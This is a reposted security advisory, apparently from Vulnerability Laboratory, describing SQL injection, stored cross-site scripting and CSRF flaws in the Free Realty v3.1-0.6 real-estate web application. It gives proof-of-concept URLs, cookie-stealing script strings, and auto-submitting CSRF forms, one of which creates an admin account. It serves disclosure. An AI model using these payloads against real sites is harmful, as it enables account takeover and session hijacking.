Free Realty v3.1-0.6的缺陷介绍及其修复方法
标题:Free Reality v3.1-0.6 - Multiple Web Vulnerabilities <br />介绍: <br />============= <br />Free Realty is primarily designed for real estate agents and offices to list properties on the internet. With Free Realty the end <br />user does not need to be fluent in web page design. Read more in the demo site <br />This is a fork of <br />software written by Jon Roig called Open Realty. Jon has moved on to version 3.0 while a number of users have requested <br />continued development on the 2.x series. Other sites of note regarding 2.x development <br />www.1axn.com/gi-bin/openforum/ikonboard.cgi the original discussion board, before Jon opened up his own. <br />影响版本: <br />========= <br />A Vulnerability Laboratory Researcher Team discovered multiple Web Vulnerabilities in the Free Reality v3.1-0.6 web application. <br />问题类型:Remote <br />技术分析: <br />======== <br />1.1 <br />A remote SQL Injection vulnerability is detected in the Free Reality v3.1-0.6 web application. <br />The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on <br />the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise. <br />Vulnerable Module(s): <br />[+] agentdisplay.php?view= <br />[+] /admin/admin.php?edit= <br />1.2 <br />Multiple persistent input validation vulnerabilities are detected in the Free Reality v3.1-0.6 web application. <br />The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). <br />Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. <br />Exploitation requires low user inter action. <br />Vulnerable Module(s): <br />[+] admin/agenteditor.php - inject notes about the Agent <br />[+] agentadmin.php?edit=2 - inject title / preview description: / Long description: / notes <br />[+] agentadmin.php?action=addlisting inject title / preview description: / Long description: / notes <br />[+] admin/adminfeatures.php - Add new feature <br />1.3 <br />A cross site request forgery vulnerability is detected in in the Free Reality v3.1-0.6 web application. The bugs allow remote <br />attackers with high required user inter action to edit user accounts. Successful exploitation can lead to account access. <br />To exploit the issue the attacker need to create a manipulated copy the edit user mask/form. Inside of the document the <br />remote can implement his own values for the update because of no form or token protection. When admin get now forced to <br />execute the script via link he is executing the new value on the update of the application if his session is not expired. <br />Vulnerable Module(s): <br />[+] admin/agenteditor.php?action=addagent - Add agent <br />[+] admin/agenteditor.php?adminmodify=2 - Modify Agent <br />测试证明: <br />================= <br />1.1 <br />The sql injection vulnerability can be exploited by remote attackers without user inter action. For demonstration or reproduce ... <br />PoC: <br />https://www.jb51.net /FR/agentdisplay.php?view=1 <br />http://127.0.0.1/FR/admin/admin.php?edit=2 <br />1.2 <br />The persistent input validation vulnerability can be exploited by remote attackers with medium till low required user inter action. <br />For demonstration or reproduce ... <br />Note: <br />The issue can be exploited by an insert on the Created Object function with script code as value. <br />The result is the persistent execution out of the web application context. <br />Strings: <br />>"<<iframe src=http:// www.jb51.net />37</iframe> ... or <br />>"<script>alert(document.cookie)</script><div style="1 <br />1.3 <br />The csrf vulnerability can be exploited by remote attackers with high required user inter action. For demonstration or reproduce ... <br /><html> <br /><form name="test" action="http://127.0.0.1/FR/admin/agenteditor.php?adminmodify=2" method="post"> <br /><input type="hidden" name="agent" value="test2"><br/> <br /><input type="hidden" name="agenttitle" value="test3"><br/> <br /><input type="hidden" name="agentpass" value="storm"><br/> <br /></form> <br /><script>document.test.submit();</script> <br /></html> <br /><html> <br /><form name="addagent" action="http://127.0.1.1/FR/admin/agenteditor.php?action=addagent" method="post"> <br /><input type="hidden" name="agent" value="test3"><br/> <br /><input type="hidden" name="agenttitle" value="test3"><br/> <br /><input type="hidden" name="agentpass" value="test3"><br/> <br /><input type="hidden" name="agentfax" value="test3"><br/> <br /><input type="hidden" name="agentcell" value="test3"><br/> <br /><input type="hidden" name="agentphone" value="test3"><br/> <br /><input type="hidden" name="agenturl" value="test3"><br/> <br /><input type="hidden" name="agentemail=" value="test3@hotmail.com"><br/> <br /><input type="hidden" name="user_level" value="admin"><br/> <br /><input type="hidden" name="notes" value="TEST#"><br/> <br /></form> <br /><script>document.addagent.submit();</script> <br /></html> <br />Risk: <br />===== <br />1.1 <br />The security risk of the remote SQL injection vulnerability is estimated as critical. <br />1.2 <br />The security risk of the persistent input validation vulnerability is estimated as medium. <br />1.3 <br />The security risk of the cross site request forgery vulnerability is estimated as low(+). <br />
頁:
[1]